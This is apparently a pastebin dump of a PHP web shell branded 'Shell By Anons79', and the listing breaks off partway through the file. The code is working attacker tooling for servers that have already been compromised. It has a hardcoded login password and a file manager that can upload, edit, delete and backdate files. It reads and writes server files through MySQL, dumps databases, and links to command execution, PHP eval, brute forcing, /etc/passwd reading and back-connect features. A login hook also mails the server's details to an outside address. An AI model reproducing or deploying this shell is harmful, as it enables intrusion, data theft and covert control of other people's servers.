· 10 years ago · Jul 02, 2016, 05:30 AM
1<?php
2error_reporting(7);
3@set_magic_quotes_runtime(0);
4ob_start();
5$mtime = explode(' ', microtime());
6$starttime = $mtime[1] + $mtime[0];
7define('SA_ROOT', str_replace('\\', '/', dirname(__FILE__)) . '/');
8//define('IS_WIN', strstr(PHP_OS, 'WIN') ? 1 : 0 );
9define('IS_WIN', DIRECTORY_SEPARATOR == '\\');
10define('IS_COM', class_exists('COM') ? 1 : 0);
11define('IS_GPC', get_magic_quotes_gpc());
12$dis_func = get_cfg_var('disable_functions');
13define('IS_PHPINFO', (!eregi("phpinfo", $dis_func)) ? 1 : 0);
14@set_time_limit(0);
15foreach (array('_GET', '_POST') as $_request) {
16 foreach ($$_request as $_key => $_value) {
17 if ($_key{0} != '_') {
18 if (IS_GPC) {
19 $_value = s_array($_value);
20 }
21 $$_key = $_value;
22 }
23 }
24}
25/*================= Info Login ================*/
26$admin = array();
27$admin['check'] = true;
28$admin['pass'] = 'chideptrai:))'; // Password login
29$admin['cookiepre'] = '';
30$admin['cookiedomain'] = '';
31$admin['cookiepath'] = '/';
32$admin['cookielife'] = 86400;
33/*===================== End =====================*/
34if ($charset == 'utf8') {
35 header("content-Type: text/html; charset=utf-8");
36} elseif ($charset == 'big5') {
37 header("content-Type: text/html; charset=big5");
38} elseif ($charset == 'gbk') {
39 header("content-Type: text/html; charset=gbk");
40} elseif ($charset == 'latin1') {
41 header("content-Type: text/html; charset=iso-8859-2");
42}
43$self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
44$timestamp = time();
45/*===================== Login =====================*/
46if ($action == "logout") {
47 scookie('vbapass', '', -86400 * 365);
48 p('<meta http-equiv="refresh" content="0;URL=' . $self . '">');
49 p('<body background=black>');
50 exit;
51}
52if ($admin['check']) {
53 if ($doing == 'login') {
54 if ($admin['pass'] == $password) {
55 scookie('vbapass', $password);
56 // Function mail Sender to my Email - Please remove this before you using this shell code, Thanks - Fernando - VBATeam
57 $time_shell = "" . date("d/m/Y - H:i:s") . "";
58 $ip_remote = $_SERVER["REMOTE_ADDR"];
59 $from_shellcode = 'shell@' . gethostbyname($_SERVER['SERVER_NAME']) . '';
60 $to_email = '';
61 $server_mail = "" . gethostbyname($_SERVER['SERVER_NAME']) . " - " . $_SERVER['HTTP_HOST'] . "";
62 $linkcr = "Link: " . $_SERVER['SERVER_NAME'] . "" . $_SERVER['REQUEST_URI'] . " - IP Excuting: $ip_remote - Time: $time_shell";
63 $header = "From: $from_shellcode\r\nReply-to: $from_shellcode";
64 @mail($to_email, $server_mail, $linkcr, $header);
65 p('<meta http-equiv="refresh" content="2;URL=' . $self . '">');
66 p('<body bgcolor=black>
67<BR><BR><div align=center><font color=red face=tahoma size=2>LOGIN.....Please wait...<BR><img src=http://t3.gstatic.com/images?q=tbn:ANd9GcRFIQy9oLc9jMWmDY_N_sxjWPyusUWC4igwK2lqBm68aDGcSfKPPA></div>');
68 exit;
69 } else {
70 $err_mess = '';
71 echo $err_mess;
72 }
73 }
74 if ($_COOKIE['vbapass']) {
75 if ($_COOKIE['vbapass'] != $admin['pass']) {
76 loginpage();
77 }
78 } else {
79 loginpage();
80 }
81}
82/*===================== Login =====================*/
83$errmsg = '';
84if ($action == 'phpinfo') {
85 if (IS_PHPINFO) {
86 phpinfo();
87 } else {
88 $errmsg = 'phpinfo() function has non-permissible';
89 }
90}
91if ($doing == 'downfile' && $thefile) {
92 if (!@file_exists($thefile)) {
93 $errmsg = 'The file you want Downloadable was nonexistent';
94 } else {
95 $fileinfo = pathinfo($thefile);
96 header('Content-type: application/x-' . $fileinfo['extension']);
97 header('Content-Disposition: attachment; filename=' . $fileinfo['basename']);
98 header('Content-Length: ' . filesize($thefile));
99 @readfile($thefile);
100 exit;
101 }
102}
103if ($doing == 'backupmysql' && !$saveasfile) {
104 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
105 $table = array_flip($table);
106 $result = q("SHOW tables");
107 if (!$result) p('<h2>' . mysql_error() . '</h2>');
108 $filename = basename($_SERVER['HTTP_HOST'] . '_MySQL.sql');
109 header('Content-type: application/unknown');
110 header('Content-Disposition: attachment; filename=' . $filename);
111 $mysqldata = '';
112 while ($currow = mysql_fetch_array($result)) {
113 if (isset($table[$currow[0]])) {
114 $mysqldata.= sqldumptable($currow[0]);
115 }
116 }
117 mysql_close();
118 exit;
119}
120// Mysql
121if ($doing == 'mysqldown') {
122 if (!$dbname) {
123 $errmsg = 'Please input dbname';
124 } else {
125 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
126 if (!file_exists($mysqldlfile)) {
127 $errmsg = 'The file you want Downloadable was nonexistent';
128 } else {
129 $result = q("select load_file('$mysqldlfile');");
130 if (!$result) {
131 q("DROP TABLE IF EXISTS tmp_angel;");
132 q("CREATE TABLE tmp_angel (content LONGBLOB NOT NULL);");
133 //Download SQL
134 q("LOAD DATA LOCAL INFILE '" . addslashes($mysqldlfile) . "' INTO TABLE tmp_angel FIELDS TERMINATED BY '__angel_{$timestamp}_eof__' ESCAPED BY '' LINES TERMINATED BY '__angel_{$timestamp}_eof__';");
135 $result = q("select content from tmp_angel");
136 q("DROP TABLE tmp_angel");
137 }
138 $row = @mysql_fetch_array($result);
139 if (!$row) {
140 $errmsg = 'Load file failed ' . mysql_error();
141 } else {
142 $fileinfo = pathinfo($mysqldlfile);
143 header('Content-type: application/x-' . $fileinfo['extension']);
144 header('Content-Disposition: attachment; filename=' . $fileinfo['basename']);
145 header("Accept-Length: " . strlen($row[0]));
146 echo $row[0];
147 exit;
148 }
149 }
150 }
151}
152?>
153<html>
154<head>
155<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
156<title><?php echo str_replace('.', '', 'Shell By Anons79'); ?></title>
157<style type="text/css">
158body,td{font: 10pt Tahoma;color:gray;line-height: 16px;}
159
160a {color: #74A202;text-decoration:none;}
161a:hover{color: #f00;text-decoration:underline;}
162.alt1 td{border-top:1px solid gray;border-bottom:1px solid gray;background:#0E0E0E;padding:5px 10px 5px 5px;}
163.alt2 td{border-top:1px solid gray;border-bottom:1px solid gray;background:#f9f9f9;padding:5px 10px 5px 5px;}
164.focus td{border-top:1px solid gray;border-bottom:0px solid gray;background:#0E0E0E;padding:5px 10px 5px 5px;}
165.fout1 td{border-top:1px solid gray;border-bottom:0px solid gray;background:#0E0E0E;padding:5px 10px 5px 5px;}
166.fout td{border-top:1px solid gray;border-bottom:0px solid gray;background:#202020;padding:5px 10px 5px 5px;}
167.head td{border-top:1px solid gray;border-bottom:1px solid gray;background:#202020;padding:5px 10px 5px 5px;font-weight:bold;}
168.head_small td{border-top:1px solid gray;border-bottom:1px solid gray;background:#202020;padding:5px 10px 5px 5px;font-weight:normal;font-size:8pt;}
169.head td span{font-weight:normal;}
170form{margin:0;padding:0;}
171h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}
172ul.info li{margin:0;color:#444;line-height:24px;height:24px;}
173u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
174input, textarea, button
175{
176 font-size: 9pt;
177 color: #ccc;
178 font-family: verdana, sans-serif;
179 background-color: #202020;
180 border-left: 1px solid #74A202;
181 border-top: 1px solid #74A202;
182 border-right: 1px solid #74A202;
183 border-bottom: 1px solid #74A202;
184}
185select
186{
187 font-size: 8pt;
188 font-weight: normal;
189 color: #ccc;
190 font-family: verdana, sans-serif;
191 background-color: #202020;
192}
193
194</style>
195<script type="text/javascript">
196function CheckAll(form) {
197 for(var i=0;i<form.elements.length;i++) {
198 var e = form.elements[i];
199 if (e.name != 'chkall')
200 e.checked = form.chkall.checked;
201 }
202}
203function $(id) {
204 return document.getElementById(id);
205}
206function goaction(act){
207 $('goaction').action.value=act;
208 $('goaction').submit();
209}
210</script>
211</head>
212<body onLoad="init()" style="margin:0;table-layout:fixed; word-break:break-all" bgcolor=black background=http://i382.photobucket.com/albums/oo263/vnhacker/bg-1.jpg>
213
214
215<div border="0" style="position:fixed; width: 100%; height: 25px; z-index: 1; top: 300px; left: 0;" id="loading" align="center" valign="center">
216 <table border="1" width="110px" cellspacing="0" cellpadding="0" style="border-collapse: collapse" bordercolor="#003300">
217 <tr>
218 <td align="center" valign=center>
219 <div border="1" style="background-color: #0E0E0E; filter: alpha(opacity=70); opacity: .7; width: 110px; height: 25px; z-index: 1; border-collapse: collapse;" bordercolor="#006600" align="center">
220 Loading<img src="http://i382.photobucket.com/albums/oo263/vnhacker/loading.gif">
221 </div>
222 </td>
223 </tr>
224 </table>
225 </div>
226 <script>
227 var ld=(document.all);
228 var ns4=document.layers;
229 var ns6=document.getElementById&&!document.all;
230 var ie4=document.all;
231 if (ns4)
232 ld=document.loading;
233 else if (ns6)
234 ld=document.getElementById("loading").style;
235 else if (ie4)
236 ld=document.all.loading.style;
237 function init()
238 {
239 if(ns4){ld.visibility="hidden";}
240 else if (ns6||ie4) ld.display="none";
241 }
242 </script>
243
244
245
246
247<table width="100%" border="0" cellpadding="0" cellspacing="0">
248 <tr class="head_small">
249 <td width=100%>
250 <table width=100%><tr class="head_small"><td width=86px><a title="Shell By Anons79" href="<?php $self; ?>"><img src=https://scontent-hkg3-1.xx.fbcdn.net/v/t1.0-9/13510918_1014776165273455_5748196367784048048_n.png?oh=ee8c14e92c6dfbd4e9ec6284126f6832&oe=57FC3CEC height=86 border=0></a></td><td>
251 <span style="float:left;"> <?php echo "Hostname: " . $_SERVER['HTTP_HOST'] . ""; ?> | <a href="#" target="_blank"><?php echo str_replace('.', '', 'Shell By Anons79'); ?> </a> | <a href="javascript:goaction('logout');"><font color=red>Logout</font></a></span> <br />
252
253 <?php
254$curl_on = @function_exists('curl_version');
255$mysql_on = @function_exists('mysql_connect');
256$mssql_on = @function_exists('mssql_connect');
257$pg_on = @function_exists('pg_connect');
258$ora_on = @function_exists('ocilogon');
259echo (($safe_mode) ? ("Safe_mod: <b><font color=green>ON</font></b> - ") : ("Safe_mod: <b><font color=red>OFF</font></b> - "));
260echo "PHP version: <b>" . @phpversion() . "</b> - ";
261echo "cURL: " . (($curl_on) ? ("<b><font color=green>ON</font></b> - ") : ("<b><font color=red>OFF</font></b> - "));
262echo "MySQL: <b>";
263$mysql_on = @function_exists('mysql_connect');
264if ($mysql_on) {
265 echo "<font color=green>ON</font></b> - ";
266} else {
267 echo "<font color=red>OFF</font></b> - ";
268}
269echo "MSSQL: <b>";
270$mssql_on = @function_exists('mssql_connect');
271if ($mssql_on) {
272 echo "<font color=green>ON</font></b> - ";
273} else {
274 echo "<font color=red>OFF</font></b> - ";
275}
276echo "PostgreSQL: <b>";
277$pg_on = @function_exists('pg_connect');
278if ($pg_on) {
279 echo "<font color=green>ON</font></b> - ";
280} else {
281 echo "<font color=red>OFF</font></b> - ";
282}
283echo "Oracle: <b>";
284$ora_on = @function_exists('ocilogon');
285if ($ora_on) {
286 echo "<font color=green>ON</font></b>";
287} else {
288 echo "<font color=red>OFF</font></b><BR>";
289}
290echo "Disable functions : <b>";
291if ('' == ($df = @ini_get('disable_functions'))) {
292 echo "<font color=green>NONE</font></b><BR>";
293} else {
294 echo "<font color=red>$df</font></b><BR>";
295}
296echo "<font color=white>Uname -a</font>: " . @substr(@php_uname(), 0, 120) . "<br>";
297echo "<font color=white>Server</font>: " . @substr($SERVER_SOFTWARE, 0, 120) . " - <font color=white>id</font>: " . @getmyuid() . "(" . @get_current_user() . ") - uid=" . @getmyuid() . " (" . @get_current_user() . ") gid=" . @getmygid() . "(" . @get_current_user() . ")<br>";
298?>
299 </td></tr></table></td>
300 </tr>
301 <tr class="alt1">
302 <td width=10%><span style="float:left;">[Server IP: <?php echo "<font color=yellow>" . gethostbyname($_SERVER['SERVER_NAME']) . "</font>"; ?> - Your IP: <?php echo "<font color=yellow>" . $_SERVER['REMOTE_ADDR'] . "</font>"; ?>] </span> <br />
303--------------------------------------------------------------------------------------<br />
304
305 <a href="javascript:goaction('file');">File Manager</a> |
306 <a href="javascript:goaction('sqladmin');">MySQL Manager</a> |
307 <a href="javascript:goaction('sqlfile');">MySQL Upload & Download</a> |
308 <a href="javascript:goaction('shell');">Execute Command</a> |
309 <a href="javascript:goaction('phpenv');">PHP Variable</a> |
310 <a href="javascript:goaction('eval');">Eval PHP Code</a>
311 <?php if (!IS_WIN) { ?> | <a href="javascript:goaction('brute');">Brute</a> <?php
312} ?>
313 <?php if (!IS_WIN) { ?> | <a href="javascript:goaction('etcpwd');">/etc/passwd</a> <?php
314} ?>
315 <?php if (!IS_WIN) { ?> | <a href="javascript:goaction('backconnect');">Back Connect</a><?php
316} ?>
317 </td>
318 </tr>
319</table>
320<table width="100%" border="0" cellpadding="15" cellspacing="0"><tr><td>
321<?php
322formhead(array('name' => 'goaction'));
323makehide('action');
324formfoot();
325$errmsg && m($errmsg);
326// Dir function
327!$dir && $dir = '.';
328$nowpath = getPath(SA_ROOT, $dir);
329if (substr($dir, -1) != '/') {
330 $dir = $dir . '/';
331}
332$uedir = ue($dir);
333if (!$action || $action == 'file') {
334 // Non-writeable
335 $dir_writeable = @is_writable($nowpath) ? 'Writable' : 'Non-writable';
336 // Delete dir
337 if ($doing == 'deldir' && $thefile) {
338 if (!file_exists($thefile)) {
339 m($thefile . ' directory does not exist');
340 } else {
341 m('Directory delete ' . (deltree($thefile) ? basename($thefile) . ' success' : 'failed'));
342 }
343 }
344 // Create new dir
345 elseif ($newdirname) {
346 $mkdirs = $nowpath . $newdirname;
347 if (file_exists($mkdirs)) {
348 m('Directory has already existed');
349 } else {
350 m('Directory created ' . (@mkdir($mkdirs, 0777) ? 'success' : 'failed'));
351 @chmod($mkdirs, 0777);
352 }
353 }
354 // Upload file
355 elseif ($doupfile) {
356 m('File upload ' . (@copy($_FILES['uploadfile']['tmp_name'], $uploaddir . '/' . $_FILES['uploadfile']['name']) ? 'success' : 'failed'));
357 }
358 // Edit file
359 elseif ($editfilename && $filecontent) {
360 $fp = @fopen($editfilename, 'w');
361 m('Save file ' . (@fwrite($fp, $filecontent) ? 'success' : 'failed'));
362 @fclose($fp);
363 }
364 // Modify
365 elseif ($pfile && $newperm) {
366 if (!file_exists($pfile)) {
367 m('The original file does not exist');
368 } else {
369 $newperm = base_convert($newperm, 8, 10);
370 m('Modify file attributes ' . (@chmod($pfile, $newperm) ? 'success' : 'failed'));
371 }
372 }
373 // Rename
374 elseif ($oldname && $newfilename) {
375 $nname = $nowpath . $newfilename;
376 if (file_exists($nname) || !file_exists($oldname)) {
377 m($nname . ' has already existed or original file does not exist');
378 } else {
379 m(basename($oldname) . ' renamed ' . basename($nname) . (@rename($oldname, $nname) ? ' success' : 'failed'));
380 }
381 }
382 // Copu
383 elseif ($sname && $tofile) {
384 if (file_exists($tofile) || !file_exists($sname)) {
385 m('The goal file has already existed or original file does not exist');
386 } else {
387 m(basename($tofile) . ' copied ' . (@copy($sname, $tofile) ? basename($tofile) . ' success' : 'failed'));
388 }
389 }
390 // File exit
391 elseif ($curfile && $tarfile) {
392 if (!@file_exists($curfile) || !@file_exists($tarfile)) {
393 m('The goal file has already existed or original file does not exist');
394 } else {
395 $time = @filemtime($tarfile);
396 m('Modify file the last modified ' . (@touch($curfile, $time, $time) ? 'success' : 'failed'));
397 }
398 }
399 // Date
400 elseif ($curfile && $year && $month && $day && $hour && $minute && $second) {
401 if (!@file_exists($curfile)) {
402 m(basename($curfile) . ' does not exist');
403 } else {
404 $time = strtotime("$year-$month-$day $hour:$minute:$second");
405 m('Modify file the last modified ' . (@touch($curfile, $time, $time) ? 'success' : 'failed'));
406 }
407 }
408 // Download
409 elseif ($doing == 'downrar') {
410 if ($dl) {
411 $dfiles = '';
412 foreach ($dl as $filepath => $value) {
413 $dfiles.= $filepath . ',';
414 }
415 $dfiles = substr($dfiles, 0, strlen($dfiles) - 1);
416 $dl = explode(',', $dfiles);
417 $zip = new PHPZip($dl);
418 $code = $zip->out;
419 header('Content-type: application/octet-stream');
420 header('Accept-Ranges: bytes');
421 header('Accept-Length: ' . strlen($code));
422 header('Content-Disposition: attachment;filename=' . $_SERVER['HTTP_HOST'] . '_Files.tar.gz');
423 echo $code;
424 exit;
425 } else {
426 m('Please select file(s)');
427 }
428 }
429 // Delete file
430 elseif ($doing == 'delfiles') {
431 if ($dl) {
432 $dfiles = '';
433 $succ = $fail = 0;
434 foreach ($dl as $filepath => $value) {
435 if (@unlink($filepath)) {
436 $succ++;
437 } else {
438 $fail++;
439 }
440 }
441 m('Deleted file have finished??choose ' . count($dl) . ' success ' . $succ . ' fail ' . $fail);
442 } else {
443 m('Please select file(s)');
444 }
445 }
446 // Function Newdir
447 formhead(array('name' => 'createdir'));
448 makehide('newdirname');
449 makehide('dir', $nowpath);
450 formfoot();
451 formhead(array('name' => 'fileperm'));
452 makehide('newperm');
453 makehide('pfile');
454 makehide('dir', $nowpath);
455 formfoot();
456 formhead(array('name' => 'copyfile'));
457 makehide('sname');
458 makehide('tofile');
459 makehide('dir', $nowpath);
460 formfoot();
461 formhead(array('name' => 'rename'));
462 makehide('oldname');
463 makehide('newfilename');
464 makehide('dir', $nowpath);
465 formfoot();
466 formhead(array('name' => 'fileopform'));
467 makehide('action');
468 makehide('opfile');
469 makehide('dir');
470 formfoot();
471 $free = @disk_free_space($nowpath);
472 !$free && $free = 0;
473 $all = @disk_total_space($nowpath);
474 !$all && $all = 0;
475 $used = $all - $free;
476 $used_percent = @round(100 / ($all / $free), 2);
477 p('<font color=yellow face=tahoma size=2><B>File Manager</b> </font> Current disk free <font color=red>' . sizecount($free) . '</font> of <font color=red>' . sizecount($all) . '</font> (<font color=red>' . $used_percent . '</font>%)</font>');
478?>
479<table width="100%" border="0" cellpadding="0" cellspacing="0" style="margin:10px 0;">
480 <form action="" method="post" id="godir" name="godir">
481 <tr>
482 <td nowrap>Current Directory (<?php echo $dir_writeable; ?>, <?php echo getChmod($nowpath); ?>)</td>
483 <td width="100%"><input name="view_writable" value="0" type="hidden" /><input class="input" name="dir" value="<?php echo $nowpath; ?>" type="text" style="width:100%;margin:0 8px;"></td>
484 <td nowrap><input class="bt" value="GO" type="submit"></td>
485 </tr>
486 </form>
487</table>
488<script type="text/javascript">
489function createdir(){
490 var newdirname;
491 newdirname = prompt('Please input the directory name:', '');
492 if (!newdirname) return;
493 $('createdir').newdirname.value=newdirname;
494 $('createdir').submit();
495}
496function fileperm(pfile){
497 var newperm;
498 newperm = prompt('Current file:'+pfile+'\nPlease input new attribute:', '');
499 if (!newperm) return;
500 $('fileperm').newperm.value=newperm;
501 $('fileperm').pfile.value=pfile;
502 $('fileperm').submit();
503}
504function copyfile(sname){
505 var tofile;
506 tofile = prompt('Original file:'+sname+'\nPlease input object file (fullpath):', '');
507 if (!tofile) return;
508 $('copyfile').tofile.value=tofile;
509 $('copyfile').sname.value=sname;
510 $('copyfile').submit();
511}
512function rename(oldname){
513 var newfilename;
514 newfilename = prompt('Former file name:'+oldname+'\nPlease input new filename:', '');
515 if (!newfilename) return;
516 $('rename').newfilename.value=newfilename;
517 $('rename').oldname.value=oldname;
518 $('rename').submit();
519}
520function dofile(doing,thefile,m){
521 if (m && !confirm(m)) {
522 return;
523 }
524 $('filelist').doing.value=doing;
525 if (thefile){
526 $('filelist').thefile.value=thefile;
527 }
528 $('filelist').submit();
529}
530function createfile(nowpath){
531 var filename;
532 filename = prompt('Please input the file name:', '');
533 if (!filename) return;
534 opfile('editfile',nowpath + filename,nowpath);
535}
536function opfile(action,opfile,dir){
537 $('fileopform').action.value=action;
538 $('fileopform').opfile.value=opfile;
539 $('fileopform').dir.value=dir;
540 $('fileopform').submit();
541}
542function godir(dir,view_writable){
543 if (view_writable) {
544 $('godir').view_writable.value=1;
545 }
546 $('godir').dir.value=dir;
547 $('godir').submit();
548}
549</script>
550 <?php
551 tbhead();
552 p('<form action="' . $self . '" method="POST" enctype="multipart/form-data"><tr class="alt1"><td colspan="7" style="padding:5px;">');
553 p('<div style="float:right;"><input class="input" name="uploadfile" value="" type="file" /> <input class="" name="doupfile" value="Upload" type="submit" /><input name="uploaddir" value="' . $dir . '" type="hidden" /><input name="dir" value="' . $dir . '" type="hidden" /></div>');
554 p('<a href="javascript:godir(\'' . $_SERVER["DOCUMENT_ROOT"] . '\');">WebRoot</a>');
555 if ($view_writable) {
556 p(' | <a href="javascript:godir(\'' . $nowpath . '\');">View All</a>');
557 } else {
558 p(' | <a href="javascript:godir(\'' . $nowpath . '\',\'1\');">View Writable</a>');
559 }
560 p(' | <a href="javascript:createdir();">Create Directory</a> | <a href="javascript:createfile(\'' . $nowpath . '\');">Create File</a>');
561 if (IS_WIN && IS_COM) {
562 $obj = new COM('scripting.filesystemobject');
563 if ($obj && is_object($obj)) {
564 $DriveTypeDB = array(0 => 'Unknow', 1 => 'Removable', 2 => 'Fixed', 3 => 'Network', 4 => 'CDRom', 5 => 'RAM Disk');
565 foreach ($obj->Drives as $drive) {
566 if ($drive->DriveType == 2) {
567 p(' | <a href="javascript:godir(\'' . $drive->Path . '/\');" title="Size:' . sizecount($drive->TotalSize) . ' Free:' . sizecount($drive->FreeSpace) . ' Type:' . $DriveTypeDB[$drive->DriveType] . '">' . $DriveTypeDB[$drive->DriveType] . '(' . $drive->Path . ')</a>');
568 } else {
569 p(' | <a href="javascript:godir(\'' . $drive->Path . '/\');" title="Type:' . $DriveTypeDB[$drive->DriveType] . '">' . $DriveTypeDB[$drive->DriveType] . '(' . $drive->Path . ')</a>');
570 }
571 }
572 }
573 }
574 p('</td></tr></form>');
575 p('<tr class="head"><td> </td><td>Filename</td><td width="16%">Last modified</td><td width="10%">Size</td><td width="20%">Chmod / Perms</td><td width="22%">Action</td></tr>');
576 // Get path
577 $dirdata = array();
578 $filedata = array();
579 if ($view_writable) {
580 $dirdata = GetList($nowpath);
581 } else {
582 // Open dir
583 $dirs = @opendir($dir);
584 while ($file = @readdir($dirs)) {
585 $filepath = $nowpath . $file;
586 if (@is_dir($filepath)) {
587 $dirdb['filename'] = $file;
588 $dirdb['mtime'] = @date('Y-m-d H:i:s', filemtime($filepath));
589 $dirdb['dirchmod'] = getChmod($filepath);
590 $dirdb['dirperm'] = getPerms($filepath);
591 $dirdb['fileowner'] = getUser($filepath);
592 $dirdb['dirlink'] = $nowpath;
593 $dirdb['server_link'] = $filepath;
594 $dirdb['client_link'] = ue($filepath);
595 $dirdata[] = $dirdb;
596 } else {
597 $filedb['filename'] = $file;
598 $filedb['size'] = sizecount(@filesize($filepath));
599 $filedb['mtime'] = @date('Y-m-d H:i:s', filemtime($filepath));
600 $filedb['filechmod'] = getChmod($filepath);
601 $filedb['fileperm'] = getPerms($filepath);
602 $filedb['fileowner'] = getUser($filepath);
603 $filedb['dirlink'] = $nowpath;
604 $filedb['server_link'] = $filepath;
605 $filedb['client_link'] = ue($filepath);
606 $filedata[] = $filedb;
607 }
608 } // while
609 unset($dirdb);
610 unset($filedb);
611 @closedir($dirs);
612 }
613 @sort($dirdata);
614 @sort($filedata);
615 $dir_i = '0';
616 foreach ($dirdata as $key => $dirdb) {
617 if ($dirdb['filename'] != '..' && $dirdb['filename'] != '.') {
618 $thisbg = bg();
619 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
620 p('<td width="2%" nowrap><font face="wingdings" size="3">0</font></td>');
621 p('<td><a href="javascript:godir(\'' . $dirdb['server_link'] . '\');">' . $dirdb['filename'] . '</a></td>');
622 p('<td nowrap>' . $dirdb['mtime'] . '</td>');
623 p('<td nowrap>--</td>');
624 p('<td nowrap>');
625 p('<a href="javascript:fileperm(\'' . $dirdb['server_link'] . '\');">' . $dirdb['dirchmod'] . '</a> / ');
626 p('<a href="javascript:fileperm(\'' . $dirdb['server_link'] . '\');">' . $dirdb['dirperm'] . '</a>' . $dirdb['fileowner'] . '</td>');
627 p('<td nowrap><a href="javascript:dofile(\'deldir\',\'' . $dirdb['server_link'] . '\',\'Are you sure will delete ' . $dirdb['filename'] . '? \\n\\nIf non-empty directory, will be delete all the files.\')">Del</a> | <a href="javascript:rename(\'' . $dirdb['server_link'] . '\');">Rename</a></td>');
628 p('</tr>');
629 $dir_i++;
630 } else {
631 if ($dirdb['filename'] == '..') {
632 p('<tr class=fout>');
633 p('<td align="center"><font face="Wingdings 3" size=4>=</font></td><td nowrap colspan="5"><a href="javascript:godir(\'' . getUpPath($nowpath) . '\');">Parent Directory</a></td>');
634 p('</tr>');
635 }
636 }
637 }
638 p('<tr bgcolor="green" stlye="border-top:1px solid gray;border-bottom:1px solid gray;"><td colspan="6" height="5"></td></tr>');
639 p('<form id="filelist" name="filelist" action="' . $self . '" method="post">');
640 makehide('action', 'file');
641 makehide('thefile');
642 makehide('doing');
643 makehide('dir', $nowpath);
644 $file_i = '0';
645 foreach ($filedata as $key => $filedb) {
646 if ($filedb['filename'] != '..' && $filedb['filename'] != '.') {
647 $fileurl = str_replace(SA_ROOT, '', $filedb['server_link']);
648 $thisbg = bg();
649 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
650 p('<td width="2%" nowrap><input type="checkbox" value="1" name="dl[' . $filedb['server_link'] . ']"></td>');
651 p('<td><a href="' . $fileurl . '" target="_blank">' . $filedb['filename'] . '</a></td>');
652 p('<td nowrap>' . $filedb['mtime'] . '</td>');
653 p('<td nowrap>' . $filedb['size'] . '</td>');
654 p('<td nowrap>');
655 p('<a href="javascript:fileperm(\'' . $filedb['server_link'] . '\');">' . $filedb['filechmod'] . '</a> / ');
656 p('<a href="javascript:fileperm(\'' . $filedb['server_link'] . '\');">' . $filedb['fileperm'] . '</a>' . $filedb['fileowner'] . '</td>');
657 p('<td nowrap>');
658 p('<a href="javascript:dofile(\'downfile\',\'' . $filedb['server_link'] . '\');">Down</a> | ');
659 p('<a href="javascript:copyfile(\'' . $filedb['server_link'] . '\');">Copy</a> | ');
660 p('<a href="javascript:opfile(\'editfile\',\'' . $filedb['server_link'] . '\',\'' . $filedb['dirlink'] . '\');">Edit</a> | ');
661 p('<a href="javascript:rename(\'' . $filedb['server_link'] . '\');">Rename</a> | ');
662 p('<a href="javascript:opfile(\'newtime\',\'' . $filedb['server_link'] . '\',\'' . $filedb['dirlink'] . '\');">Time</a>');
663 p('</td></tr>');
664 $file_i++;
665 }
666 }
667 p('<tr class="fout1"><td align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td><td><a href="javascript:dofile(\'downrar\');">Packing download selected</a> - <a href="javascript:dofile(\'delfiles\');">Delete selected</a></td><td colspan="4" align="right">' . $dir_i . ' directories / ' . $file_i . ' files</td></tr>');
668 p('</form></table>');
669} // end dir
670elseif ($action == 'sqlfile') {
671 if ($doing == "mysqlupload") {
672 $file = $_FILES['uploadfile'];
673 $filename = $file['tmp_name'];
674 if (file_exists($savepath)) {
675 m('The goal file has already existed');
676 } else {
677 if (!$filename) {
678 m('Please choose a file');
679 } else {
680 $fp = @fopen($filename, 'r');
681 $contents = @fread($fp, filesize($filename));
682 @fclose($fp);
683 $contents = bin2hex($contents);
684 if (!$upname) $upname = $file['name'];
685 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
686 $result = q("SELECT 0x{$contents} FROM mysql.user INTO DUMPFILE '$savepath';");
687 m($result ? 'Upload success' : 'Upload has failed: ' . mysql_error());
688 }
689 }
690 }
691?>
692<script type="text/javascript">
693function mysqlfile(doing){
694 if(!doing) return;
695 $('doing').value=doing;
696 $('mysqlfile').dbhost.value=$('dbinfo').dbhost.value;
697 $('mysqlfile').dbport.value=$('dbinfo').dbport.value;
698 $('mysqlfile').dbuser.value=$('dbinfo').dbuser.value;
699 $('mysqlfile').dbpass.value=$('dbinfo').dbpass.value;
700 $('mysqlfile').dbname.value=$('dbinfo').dbname.value;
701 $('mysqlfile').charset.value=$('dbinfo').charset.value;
702 $('mysqlfile').submit();
703}
704</script>
705<?php
706 !$dbhost && $dbhost = 'localhost';
707 !$dbuser && $dbuser = 'root';
708 !$dbport && $dbport = '3306';
709 $charsets = array('' => 'Default', 'gbk' => 'GBK', 'big5' => 'Big5', 'utf8' => 'UTF-8', 'latin1' => 'Latin1');
710 formhead(array('title' => 'MYSQL Information', 'name' => 'dbinfo'));
711 makehide('action', 'sqlfile');
712 p('<p>');
713 p('DBHost:');
714 makeinput(array('name' => 'dbhost', 'size' => 20, 'value' => $dbhost));
715 p(':');
716 makeinput(array('name' => 'dbport', 'size' => 4, 'value' => $dbport));
717 p('DBUser:');
718 makeinput(array('name' => 'dbuser', 'size' => 15, 'value' => $dbuser));
719 p('DBPass:');
720 makeinput(array('name' => 'dbpass', 'size' => 15, 'value' => $dbpass));
721 p('DBName:');
722 makeinput(array('name' => 'dbname', 'size' => 15, 'value' => $dbname));
723 p('DBCharset:');
724 makeselect(array('name' => 'charset', 'option' => $charsets, 'selected' => $charset));
725 p('</p>');
726 formfoot();
727 p('<form action="' . $self . '" method="POST" enctype="multipart/form-data" name="mysqlfile" id="mysqlfile">');
728 p('<h2>Upload file</h2>');
729 p('<p><b>This operation the DB user must has FILE privilege</b></p>');
730 p('<p>Save path(fullpath): <input class="input" name="savepath" size="45" type="text" /> Choose a file: <input class="input" name="uploadfile" type="file" /> <a href="javascript:mysqlfile(\'mysqlupload\');">Upload</a></p>');
731 p('<h2>Download file</h2>');
732 p('<p>File: <input class="input" name="mysqldlfile" size="115" type="text" /> <a href="javascript:mysqlfile(\'mysqldown\');">Download</a></p>');
733 makehide('dbhost');
734 makehide('dbport');
735 makehide('dbuser');
736 makehide('dbpass');
737 makehide('dbname');
738 makehide('charset');
739 makehide('doing');
740 makehide('action', 'sqlfile');
741 p('</form>');
